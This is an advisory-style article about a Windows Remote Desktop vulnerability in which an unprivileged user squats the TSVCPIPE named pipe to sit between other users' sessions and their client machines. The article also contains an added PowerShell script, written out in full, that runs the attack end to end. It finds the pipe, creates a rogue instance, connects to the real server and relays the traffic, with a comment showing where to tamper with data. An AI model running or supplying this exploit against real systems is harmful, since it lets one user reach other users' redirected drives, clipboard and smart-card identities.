This vulnerability allows any standard, unprivileged user who is connected to a remote machine via Remote Desktop to gain file system access to the client machines of other connected users, to view and modify the clipboard data of other connected users, and to impersonate the identity of other users who log on to the machine using smart cards.
This could lead to data privacy issues, lateral movement and privilege escalation.
Affected Operating Systems
According to CyberArk’s researchers: “The latest versions of Windows (client and server editions) are affected by this vulnerability, and it goes back at least to Windows Server 2012 R2, so we can say that the majority of Windows versions in use today are affected.”
Basic Attack Description
- An attacker connects to a remote machine via RDP.
- The attacker lists the open named pipes and finds the full name of the TSVCPIPE pipe.
- The attacker creates a pipe server instance with the same name and waits for a new connection.
- When a new user connects, RDS creates its own pipe server instance for that session, together with a pipe client that attempts to connect to it.
- Because waiting instances of a named pipe are served in FIFO order, the pipe client connects to the attacker's instance, which was created first, instead of the one created by the RDS service.
- The attacker then connects as a client to the real RDS pipe server instance, which is still waiting for a connection.
- The attacker now holds both ends of the connection and can act as a man-in-the-middle, passing data back and forth while viewing and, optionally, modifying it.
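The steps above, carried out in PowerShell as an added example. This is not CyberArk's tool and not code from the original article; it assumes only what the article states, namely that the target pipe name begins with TSVCPIPE (the full name is read from the live system rather than hard-coded), and that named pipe instances are served first-in, first-out. The `try/catch` around the squatting step doubles as a quick check: if the pipe's DACL denies other users the right to create a further instance, the call throws and the system is not exploitable this way.

```powershell
# Added example, not CyberArk's tool: squat the RDS named pipe and relay its traffic.
# Assumption from the article: the pipe name starts with "TSVCPIPE"; the exact
# full name is discovered at runtime, not hard-coded.

# Step 1: enumerate \\.\pipe\ and find the full TSVCPIPE name.
$pipePaths  = [System.IO.Directory]::GetFiles('\\.\pipe\')
$targetPath = $pipePaths | Where-Object { $_ -like '*TSVCPIPE*' } | Select-Object -First 1
if (-not $targetPath) { throw 'No TSVCPIPE pipe found; is an RDP session active?' }
$pipeName = Split-Path -Path $targetPath -Leaf
Write-Host "Target pipe: $pipeName"

# Step 2: create our own server instance under the same name, before the next user connects.
# If the pipe's DACL denies FILE_CREATE_PIPE_INSTANCE to our account, this throws
# UnauthorizedAccessException and the attack stops here.
try {
    $ourServer = New-Object System.IO.Pipes.NamedPipeServerStream(
        $pipeName,
        [System.IO.Pipes.PipeDirection]::InOut,
        [System.IO.Pipes.NamedPipeServerStream]::MaxAllowedServerInstances,
        [System.IO.Pipes.PipeTransmissionMode]::Byte,
        [System.IO.Pipes.PipeOptions]::Asynchronous)
} catch [System.UnauthorizedAccessException] {
    throw "Cannot create a second instance of $pipeName; the pipe DACL blocks squatting."
}
Write-Host 'Waiting for the RDS pipe client of the next session...'
$ourServer.WaitForConnection()   # FIFO: the next connect lands on our instance

# Step 3: connect as a client to the real RDS instance, which is still waiting.
$toRealServer = New-Object System.IO.Pipes.NamedPipeClientStream(
    '.', $pipeName, [System.IO.Pipes.PipeDirection]::InOut)
$toRealServer.Connect(5000)

# Step 4: relay both directions, printing a hex prefix of each chunk.
# To tamper with traffic, modify $Buf here before it is written to $Dest.
function Relay-Chunk {
    param([byte[]]$Buf, [int]$Count, [System.IO.Stream]$Dest, [string]$Label)
    $hex = [System.BitConverter]::ToString($Buf, 0, [Math]::Min($Count, 16))
    Write-Host ("{0}: {1} bytes {2}" -f $Label, $Count, $hex)
    $Dest.Write($Buf, 0, $Count)
    $Dest.Flush()
}
$bufIn   = New-Object byte[] 65536   # data from the RDS pipe client, arriving on our server end
$bufOut  = New-Object byte[] 65536   # data from the real RDS server, arriving on our client end
$readIn  = $ourServer.ReadAsync($bufIn, 0, $bufIn.Length)
$readOut = $toRealServer.ReadAsync($bufOut, 0, $bufOut.Length)
while ($true) {
    $done = [System.Threading.Tasks.Task]::WaitAny([System.Threading.Tasks.Task[]]@($readIn, $readOut))
    if ($done -eq 0) {
        $n = $readIn.Result
        if ($n -le 0) { break }                       # RDS client closed its end
        Relay-Chunk -Buf $bufIn -Count $n -Dest $toRealServer -Label 'client -> server'
        $readIn = $ourServer.ReadAsync($bufIn, 0, $bufIn.Length)
    } else {
        $n = $readOut.Result
        if ($n -le 0) { break }                       # RDS server closed its end
        Relay-Chunk -Buf $bufOut -Count $n -Dest $ourServer -Label 'server -> client'
        $readOut = $toRealServer.ReadAsync($bufOut, 0, $bufOut.Length)
    }
}
$ourServer.Dispose()
$toRealServer.Dispose()
```

Timing matters: the squatting instance has to be waiting before the victim's session is created, which is why step 2 blocks in `WaitForConnection()` rather than polling. The relay uses two outstanding async reads and `Task.WaitAny` so that whichever side speaks first is forwarded without a second thread.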
CyberArk has created a tool that performs these steps to create a man-in-the-middle that prints the data passing through the pipes for demonstration purposes.
The researchers targeted the device redirection channel (RDPDR), which redirects devices such as drives and smart cards from the client machine into the remote session. Intercepting this channel lets an attacker access other users' redirected drives and smart-card data.